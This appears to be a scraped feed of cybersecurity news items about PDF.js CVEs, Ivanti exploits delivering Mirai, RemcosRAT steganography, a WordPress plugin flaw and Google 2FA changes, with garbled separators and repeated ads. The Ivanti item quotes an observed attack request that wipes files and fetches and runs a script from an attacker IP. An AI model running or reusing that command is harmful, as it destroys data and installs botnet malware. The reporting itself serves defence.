-
Χ΄Defenders think in lists, attackers think in graphs,β said John Lambert from Microsoft, distilling the fundamental difference in mindset between those who defend IT systems and those who try to compromise them. The traditional approach for defenders is to list security gaps directly related to their assets in the network and eliminate as many as possible, starting with the most critical.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
A newer version of a malware loader called Hijack Loader has been observed incorporating an updated set of anti-analysis techniques to fly under the radar. “These enhancements aim to increase the malware’s stealthiness, thereby remaining undetected for longer periods of time,” Zscaler ThreatLabz researcher Muhammed Irfan V A said in a technical report. “Hijack
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
A new critical vulnerability has been discovered in PDF.js, which could allow a threat actor to execute arbitrary code when opening a malicious PDF. PDF.js allows browsers to render PDF files without any plugins or external software.Β
This vulnerability affects multiple browsers and applications that use React-PDF.
An interesting fact is that Mozilla PDF.js is the original open-source library that focuses on rendering PDF documents within a browser, and the React-PDF PDF.js is built upon Mozilla PDF.js and used for integrating PDF.js into React applications.
With millions of users using PDF files, the threat landscape for this vulnerability could affect millions of PDF users as well as React applications that use React PDF.
Document Free Webinar : Live API Attack Simulation
94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:
Key Takeaways:
- An exploit of OWASP API Top 10 vulnerability
- A brute force ATO (Account Takeover) attack on API
- A DDoS attack on an API
- Positive security model automation to prevent API attacks
Start protecting your APIs from hackers
As a matter of this, PDF.js is being used by many browsers like Mozilla Firefox, Safari, Google Chrome, and Edge, making its threat landscape larger than ever.
However, this vulnerability has been patched by Wojciech Maj, the React-pdf project’s maintainer.
PDF.js is built into Mozilla Firefox as a default PDF viewer. There were two CVEs associated with this vulnerability, CVE-2024-34342 and CVE-2024-4367.
Technical Analysis
CVE-2024-34342 : React-pdf’s PDF.js Vulnerable To Arbitrary JavaScript Execution
This vulnerability is related to react-pdf that can be exploited by a threat actor using a malicious PDF file.
However, certain prerequisites for exploiting it completely exist, including using PDF.js to load the malicious PDF and configuring PDF.js with isEvalSupported set to `true`.
If these two conditions exist, then the threat actor will be able to execute JavaScript in the context of the hosting domain.
The severity for this vulnerability has been given as 7.1 (High). React-pdf has patched this vulnerability by forcing `isEvalSupported` to `false` which removes the attack vector.
CVE-2024-4367: Mozilla PDF.js Could Allow For Arbitrary Code Execution
This vulnerability exists in the Mozilla PDF.js library which could allow a threat actor to execute arbitrary code under the context of the logged on user.
Moreover, based on the user’s privilege, it is possible for a threat actor to exploit this vulnerability and βinstall programs; view, change, or delete data; or create new accounts with full user rights.β
The vulnerability exists due to the same reason as the react-pdf PDF.js that has the isEvalSupported set to true as the default value.
The severity for this vulnerability is yet to be categorized.
Nevertheless, it is recommended for users to upgrade their products to the latest versions in order to prevent the exploitation of these vulnerabilities by threat actors.
Is Your Network Under Attack? - Read CISOβs Guide to Avoiding the Next Breach -Β Download Free GuideThe post Critical PDF.js & React-PDF Vulnerabilities Threaten Millions Of PDF Users appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Juniper Threat Labs has reported active exploitation attempts targeting vulnerabilities in Ivanti Pulse Secure VPN appliances.
These vulnerabilities, identified as CVE-2023-46805 and CVE-2024-21887, have been exploited to deliver the Mirai botnet, among other malware, posing a significant threat to network security worldwide.
Document Free Webinar : Live API Attack Simulation
94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:
Key Takeaways:
- An exploit of OWASP API Top 10 vulnerability
- A brute force ATO (Account Takeover) attack on API
- A DDoS attack on an API
- Positive security model automation to prevent API attacks
Start protecting your APIs from hackers
CVE-2023-46805: Authentication Bypass
CVE-2023-46805 is a critical security flaw affecting Ivanti Connect Secure (ICS) and Ivanti Policy Secure gateways.
This vulnerability allows remote attackers to bypass authentication mechanisms and gain unauthorized access to restricted resources.
The flaw resides in theΒ /api/v1/totp/user-backup-codeΒ endpoint, which lacks sufficient security checks. This enables attackers to exploit a path traversal flaw and access public-facing areas without proper authentication.
Affected versions include 9. x and 22. x of both Ivanti Connect Secure and Ivanti Policy Secure Gateways.
CVE-2024-21887: Command Injection
The second vulnerability, CVE-2024-21887, is a command injection flaw found in the web components of Ivanti Connect Secure and Ivanti Policy Secure.
This vulnerability allows attackers to send specially crafted requests to execute arbitrary commands on the appliance.
This flaw is exploitable over the internet and involves a command injection in theΒ /api/v1/license/key-status/;Β API call.
By exploiting the CVE-2023-46805 vulnerability to gain access to this endpoint, attackers can inject malicious payloads, which can lead to the execution of shell commands and the delivery of malware, including the Mirai botnet.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.Mirai Botnet Delivery
Juniper Threat Labs’ analysis has revealed instances where attackers have used these vulnerabilities to deliver Mirai payloads through shell scripts.
The following is an example of the observed request:Β
The encoded URL decodes to (This will come in a code block in WordPress)
GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1The observed attack involves a command sequence that attempts to wipe files, download a script from a remote server, set executable permissions, and execute the script, potentially leading to a system infection.
The content of wtf.sh (in WordPress, this should come in a code block) Note that the file names use several offensive and derogatory terms and are shown for this research only.
There are five system directories that these tools try to get to: “/tmp”, “/var/run”, “/mnt”, “/root”, and “/”. It gets a file called “lol” from a certain URL (http://192[.]3[.]152[.]183/mips) once it finds a place it can get to.
It lets the downloaded file run after downloading it and runs it with the argument “0day_machine.” Using “||” makes sure that the next commands only run if the tries to change directories failed before.
This means that the following command runs in the first directory that can be reached in the list.
Juniper analyzed the payloads, Which have been identified as part of the Mirai botnet, indicating the severity of the threat posed by these vulnerabilities.
Exploiting Ivanti Pulse Secureβs vulnerabilities for Mirai botnet delivery underscores the evolving landscape of cyber threats.
Juniper Networks SRX Series Next-Generation Firewall (NGFW) customers with an IDP license are protected against these vulnerabilities using specific signatures for CVE-2023-46805 and CVE-2024-21887.
Organizations using Ivanti Pulse Secure appliances are urged to apply the provided patches immediately and review their security posture to protect against these and future vulnerabilities.
Indicators of Compromise
Hash Values of Mirai:
F20da76d75c7966abcbc050dde259a2c85b331c80cce0d113bc976734b78d61d
d6f5fc248e4c8fc7a86a8193eb970fe9503f2766951a3e4b8c084684e423e917
8f0c5baaca3b81bdaf404de8e7dcca1e60b01505297d14d85fea36067c2a0f14
10686a12b7241a0836db6501a130ab67c7b38dbd583ccd39c9e655096695932e
5fcbe868a8c53b7146724d579ff82252f00d62049a75a04baa4476e300b42d15
a843971908aa31a81d96cc8383dcde7f386050c6e3437ad6a470f43dc2bf894b
cf1b85d4812f7ee052666276a184b481368f0c0c7a43e6d5df903535f466c5fd
575f0acd67df2620378fb5bd8379fd2f2ba0539b614986d60e85822ba0e9aa08
5d155f86425b02e45a6a5d62eb8ce7827c9c43f3025bffd6d996aabd039d27f9
1e6d93a27b0d7e97df5405650986e32641696967c07df3fa8edd41063b49507b
b9d92f637996e981006173eb207734301ff69ded8f9c2a7f0c9b6d5fcc9063a2
038187ceb4df706b13967d2a4bff9f67256ba9615c43196f307145a01729b3b8
850d3521693b4e1ec79981b3232e87b0bc22af327300dfdc7ea1b7a7e97619cd
b0bc9a42a874cab6583e4993de7cc11a2b8343a4453bda97b83b0c2975e7181d
3d19de117388d50e5685d203683c2045881a92646c69ee6d4b99a71bf65dafa7
4e2c5513cf1c4a3c12c6e108d0120d57355b3411c30d59dfb0d263ad932b686853f6cedcf89fccdcb6b4b9c7c756f73be3e027645548ee7370fd3486840099c4
67d989388b188a817a4d006503e5350a1a2af7eb64006ec6ad6acc51e29fdcd5
9b5fe87aaa4f7ae1c375276bfe36bc862a150478db37450858bbfb3fb81123c2
3e785100c227af58767f253e4dfe937b2aa755c363a1497099b63e3079209800
5b20ed646362a2c6cdc5ca0a79850c7d816248c7fd5f5203ce598a4acd509f6b
c27b64277c3d14b4c78f42ca9ee2438b602416f988f06cb1a3e026eab2425ffcIs Your Network Under Attack? - Read CISOβs Guide to Avoiding the Next Breach - Download Free GuideThe post Hackers Actively Exploiting Ivanti Pulse Secure Vulnerabilities appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Hackers are now using steganography techniques to distribute the notorious Remote Access Trojan (RAT) known as RemcosRAT.
This method, which involves hiding malicious code within seemingly innocuous image files, marks a concerning evolution in malware delivery tactics.
The Initial Breach: Word Documents and RTF Files
The attack begins with a seemingly harmless Word document that contains an external link.
This document employs a template injection technique designed to exploit vulnerabilities within the document’s processing.
The AhnLab Security Intelligence Centre (ASEC) has recently found that steganography is being used to spread RemcosRAT.
A Word document containing an external link Document Free Webinar : Live API Attack Simulation
94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise:
Key Takeaways:
- An exploit of OWASP API Top 10 vulnerability
- A brute force ATO (Account Takeover) attack on API
- A DDoS attack on an API
- Positive security model automation to prevent API attacks
Start protecting your APIs from hackers
Upon opening the document, an RTF file is downloaded and executed.
This file exploits a known vulnerability in the equation editor component (EQNEDT32.EXE) of Microsoft Word, leading to the download of a VBScript with a misleading β.jpgβ file extension from a command and control (C2) server.
Another VBScript is fetched from βpaste.eeβ, a service that allows users to upload and share text snippets.
VBScript downloaded by the RTF file The Steganography Technique
The downloaded VBScript is heavily obfuscated, making it difficult for traditional antivirus software to detect the malicious intent.
This script executes a PowerShell command, which further downloads an image from an external source.
The obfuscated script (eh1G4) The cunning aspect of this attack lies within the downloaded image file.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.The image contains Base64 encoded data hidden behind the βFF D9β marker, which typically denotes the end of a JPEG file. The PowerShell script locates the data encoded between β<<BASE64 START>>β and βBASE64_ENDβ markers and decodes it.
The PowerShell script downloading a steganography image The decoded data reveals a β.NET DLLβ file, which is then executed through reflective code loading, a technique that allows code to be executed within the memory space of a process.
The Base64-encoded data contained in a normal image file Final Execution: RemcosRAT Deployment
The script doesnβt stop there; it downloads an additional file from the C2 server and creates a RegAsm.exe child process to execute the file using the process hollowing technique.
This ultimately leads to the execution of RemcosRAT on the victim’s machine.
RemcosRAT executed through the process of hollowing Given the diverse methods through which Remcos RAT can be distributed, including spam emails and disguised crack software download links, users are urged to exercise extreme caution.
Keeping antivirus solutions updated to the latest version is also recommended to block such malware infections preemptively.
This sophisticated use of steganography to conceal and deliver malware represents a significant shift in the landscape of cyber threats.
As attackers continue to innovate, the importance of maintaining robust cybersecurity practices and awareness among users cannot be overstated.
Is Your Network Under Attack? - Read CISOβs Guide to Avoiding the Next Breach - Download Free GuideThe post Hackers Employing Steganography Methods to Deliver Notorious RemcosRAT appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
A high-severity flaw impacting the LiteSpeed Cache plugin for WordPress is being actively exploited by threat actors to create rogue admin accounts on susceptible websites. The findings come from WPScan, which said that the vulnerability (CVE-2023-40000, CVSS score: 8.3) has been leveraged to set up bogus admin users with the names wpsuppβuser
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
A high-severity flaw impacting the LiteSpeed Cache plugin for WordPress is being actively exploited by threat actors to create rogue admin accounts on susceptible websites. The findings come from WPScan, which said that the vulnerability (CVE-2023-40000, CVSS score: 8.3) has been leveraged to set up bogus admin users with the names wpsuppβuser
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
Google has announced an update to its two-factor authentication (2FA) process, also known as 2-step Verification (2SV), aimed at simplifying the setup and making it easier for users to secure their accounts.
The changes rolled out on Monday, May 6, 2024, will affect both personal and Google Workspace accounts.
One of the key changes is the elimination of the requirement to provide a phone number before adding an authenticator app or hardware security key as the second verification step.
Document Integrate ANY.RUN in Your Company for Effective Malware Analysis
Are you from SOC, Threat Research, or DFIR departments? If so, you can join an online community of 400,000 independent security researchers:
- Real-time Detection
- Interactive Malware Analysis
- Easy to Learn by New Security Team members
- Get detailed reports with maximum data
- Set Up Virtual Machine in Linux & all Windows OS Versions
- Interact with Malware Safely
If you want to test all these features now with completely free access to the sandbox:
Users can now directly set up Google Authenticator, other time-based one-time password (TOTP) apps, or hardware security keys as their preferred 2FA method.
For those opting for hardware security keys, Google offers two options on the “Passkeys and security keys” page.
Users can either register a FIDO1 credential on the security key or create a passkey, which registers a FIDO2 credential.
The latter option requires users to set a PIN on the security key for local verification.
On-Demand Webinar to Secure the Top 3 SME Attack Vectors: Watch for Free.Google Workspace users may still be required to enter their password alongside their passkey if the admin policy for “Allow users to skip passwords at sign-in by using passkeys” remains turned off.
However, if a user decides to turn off 2FA from their account settings, their enrolled second steps, such as backup codes or Google Authenticator, will no longer be automatically removed, unlike the previous behavior.
The update is expected to streamline the 2FA setup process and provide users with more flexibility in choosing their preferred authentication method.
It also aims to make it easier for administrators to enforce 2SV policies within their organizations, contributing to overall account security.
Google’s commitment to enhancing account security is further demonstrated by the fact that over 400 million Google accounts have started using passkeys over the past year for passwordless authentication.
As cyber threats continue to evolve, the adoption of modern authentication methods like FIDO2 becomes increasingly crucial in protecting users from phishing and session hijacking attacks.
Is Your Network Under Attack? - Read CISOβs Guide to Avoiding the Next Breach - Download Free GuideThe post Google Simplifies Two-Factor Authentication Setup Process appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
The Pentagon has started to use the technology, but challenges lie ahead.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
-
U.S. SOCOM wants to use new tools to give small teams a big punch.
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
ΒΆΒΆΒΆΒΆΒΆ
CYBERSECURITY / DEFENSE / INTELLIGENCE
